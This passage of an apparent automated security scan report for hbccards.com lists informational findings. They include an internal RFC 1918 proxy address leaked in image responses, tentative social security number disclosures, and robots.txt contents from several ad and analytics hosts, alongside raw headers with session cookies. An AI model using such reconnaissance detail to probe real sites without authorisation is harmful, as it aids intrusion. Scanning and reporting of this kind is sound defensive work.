User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:14 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "5cffa871df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:45 GMT
X-Powered-By: ASP.NET
Content-Length: 1702
X-Varnish: 4073108324 4073020735
Age: 125
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................,....
...[SNIP]...
24.229. http://www.hbccards.com/images/nav_gc_on.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_gc_on.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_gc_on.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:23 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "b09a84871df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:46 GMT
X-Powered-By: ASP.NET
Content-Length: 2125
X-Varnish: 4073115530 4073021436
Age: 132
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................,....
...[SNIP]...
24.230. http://www.hbccards.com/images/nav_learnmore.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_learnmore.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_learnmore.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:15 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "d8a6f5871df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:47 GMT
X-Powered-By: ASP.NET
Content-Length: 1715
X-Varnish: 4073109237 4073020967
Age: 125
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................,....
...[SNIP]...
24.231. http://www.hbccards.com/images/nav_learnmore_on.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_learnmore_on.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_learnmore_on.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:23 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "f074aa881df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:48 GMT
X-Powered-By: ASP.NET
Content-Length: 2168
X-Varnish: 4073115534 4073021485
Age: 133
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................,....
...[SNIP]...
24.232. http://www.hbccards.com/images/nav_left_inside_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_left_inside_bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_left_inside_bg.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:21 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "fa461e891df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:49 GMT
X-Powered-By: ASP.NET
Content-Length: 1795
X-Varnish: 4073113467 4073047591
Age: 92
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................
..
...[SNIP]...
24.233. http://www.hbccards.com/images/nav_usegc.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_usegc.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_usegc.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:15 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "46a159891df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:49 GMT
X-Powered-By: ASP.NET
Content-Length: 2156
X-Varnish: 4073109171 4073020742
Age: 126
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................,....
...[SNIP]...
24.234. http://www.hbccards.com/images/nav_usegc_on.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_usegc_on.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_usegc_on.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:23 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "a6ccf891df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:50 GMT
X-Powered-By: ASP.NET
Content-Length: 2815
X-Varnish: 4073115581 4073021437
Age: 133
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................,....
...[SNIP]...
24.235. http://www.hbccards.com/images/nav_whyhbc.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_whyhbc.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_whyhbc.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:14 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "24bacf8a1df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:51 GMT
X-Powered-By: ASP.NET
Content-Length: 1671
X-Varnish: 4073108187 4073020679
Age: 124
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................,....
...[SNIP]...
24.236. http://www.hbccards.com/images/nav_whyhbc_on.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/nav_whyhbc_on.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/nav_whyhbc_on.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/ordernow.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; sifrFetch=true; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.2.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:23 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "fe5fb38b1df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:20:53 GMT
X-Powered-By: ASP.NET
Content-Length: 2030
X-Varnish: 4073115528 4073021433
Age: 133
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................,....
...[SNIP]...
24.237. http://www.hbccards.com/images/poweredby.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/poweredby.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/poweredby.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "34bcef8f1df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:21:00 GMT
X-Powered-By: ASP.NET
Content-Length: 13065
X-Varnish: 4073110195 4073021013
Age: 126
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....H.H.....mExif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS3 Windows.2009:07:25 11:56:43.........
...[SNIP]...
24.238. http://www.hbccards.com/images/sec_nav_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/sec_nav_bg.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/sec_nav_bg.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:14 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "6a8caf921df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:21:05 GMT
X-Powered-By: ASP.NET
Content-Length: 740
X-Varnish: 4073108189 4073020973
Age: 124
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
24.239. http://www.hbccards.com/images/spacer.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/spacer.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/spacer.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:14 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "6c9224931df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:21:05 GMT
X-Powered-By: ASP.NET
Content-Length: 306
X-Varnish: 4073108198 4073020682
Age: 124
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...
24.240. http://www.hbccards.com/images/spacer2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hbccards.com
Path:   /images/spacer2.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/spacer2.jpg HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "de468931df1ca1:0"
Last-Modified: Tue, 11 May 2010 15:21:06 GMT
X-Powered-By: ASP.NET
Content-Length: 306
X-Varnish: 4073110087 4073020838
Age: 127
Via: 1.1 varnish 172.17.34.80
X-Cache: HIT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................'....
...[SNIP]...
25. Social security numbers disclosed  previous  next
There are 2 instances of this issue:

Issue background

Responses containing social security numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid SSNs and whether their disclosure within the application is appropriate.

25.1. http://www.hbccards.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.hbccards.com
Path:   /

Issue detail

The following social security number was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www2.hbc.com/en/index.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:11 GMT
Server: Microsoft-IIS/7.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Powered-By: ASP.NET
Content-Length: 18564
Set-Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; path=/
Set-Cookie: X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Co
...[SNIP]...
<a href = "http://static.olark.com/js/html/url_handler.html?url=http://www.hbccards.com/default.asp&siteid=5613-104-10-4004" target="_top">
...[SNIP]...
25.2. http://www.hbccards.com/ordernow.asp  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.hbccards.com
Path:   /ordernow.asp

Issue detail

The following social security number was disclosed in the response:

Request

GET /ordernow.asp HTTP/1.1
Host: www.hbccards.com
Proxy-Connection: keep-alive
Referer: http://www.hbccards.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASQRRDR=KMHDLKEBEFFFDGLAGGIHOIMA; X-Mapping-ofcbhgem=8D3F5C4CE3306DE23752A8D1F5AEFD98; __utmz=143952236.1301493176.1.1.utmcsr=www2.hbc.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/index.shtml; __utma=143952236.1494936254.1301493176.1301493176.1301493176.1; __utmc=143952236; __utmb=143952236.1.10.1301493176

Response

HTTP/1.1 200 OK
Date: Wed, 30 Mar 2011 13:52:16 GMT
Server: Microsoft-IIS/7.0
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 26877


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v
...[SNIP]...
<a href = "http://static.olark.com/js/html/url_handler.html?url=http://www.hbccards.com/ordernow.asp&siteid=5613-104-10-4004" target="_top">
...[SNIP]...
26. Robots.txt file  previous  next
There are 41 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

26.1. http://ad.doubleclick.net/adi/N5956.Google/B3941858.12  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5956.Google/B3941858.12

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Fri, 25 Mar 2011 19:13:16 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /
26.2. http://api.search.live.net/json.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.search.live.net
Path:   /json.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.search.live.net

Response

HTTP/1.0 200 OK
Content-Length: 1854
Content-Type: text/plain
Last-Modified: Thu, 03 Mar 2011 23:29:33 GMT
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-Akamai-TestID: 476ce4a3643b454aa1b5b4febda7dd8f
Cache-Control: public, max-age=15551997
Date: Sat, 26 Mar 2011 20:36:08 GMT
Connection: close

User-agent: *
Disallow: /bmi/
Disallow: /BVFrame.aspx
Disallow: /BVSandbox.aspx
Disallow: /cashback/admin
Disallow: /cashback/go
Disallow: /challenge
Disallow: /community/forums/tags
Disallow:
...[SNIP]...
26.3. http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /addyn/3.0/5113.1/221794/0/-1/size=300x75

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: at.atwola.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /
26.4. http://atgincorporated.com/atgmenu_11.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atgincorporated.com
Path:   /atgmenu_11.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: atgincorporated.com

Response

HTTP/1.1 200 OK
Content-Length: 653
Content-Type: text/plain
Content-Location: http://atgincorporated.com/robots.txt
Last-Modified: Wed, 21 Jul 2010 02:49:47 GMT
Accept-Ranges: bytes
ETag: "4cb3c0617f28cb1:689"
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 17:03:41 GMT
Connection: close

# Created with RoboGen SE
# http://www.rietta.com/robogen/
# --------------------------------
# ATG, Inc.

# Robot Exclusion File -- robots.txt

# Author: Tamara L Gribble

# Last Updated:
...[SNIP]...
26.5. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 06 Jan 2010 17:35:59 GMT
Content-Length: 28
Content-Type: text/plain
Expires: Sat, 26 Mar 2011 19:13:28 GMT
Date: Fri, 25 Mar 2011 19:13:28 GMT
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

User-agent: *
Disallow: /
26.6. http://clients1.google.com/complete/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clients1.google.com
Path:   /complete/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clients1.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Feb 2011 19:38:06 GMT
Date: Fri, 25 Mar 2011 19:19:56 GMT
Expires: Fri, 25 Mar 2011 19:19:56 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
26.7. http://dominionenterprises.112.2o7.net/b/ss/desoundings/1/H.22.1/s0369559922255  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dominionenterprises.112.2o7.net
Path:   /b/ss/desoundings/1/H.22.1/s0369559922255

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dominionenterprises.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:30 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "360d9b-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www108
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:
26.8. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Fri, 25 Mar 2011 19:08:31 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
26.9. http://imagec17.247realmedia.com/RealMedia/ads/Creatives/Dom_Ent/HuckinsYacht-Sound-Rect-300x250/huckins_0311.swf/1299012270  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagec17.247realmedia.com
Path:   /RealMedia/ads/Creatives/Dom_Ent/HuckinsYacht-Sound-Rect-300x250/huckins_0311.swf/1299012270

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imagec17.247realmedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
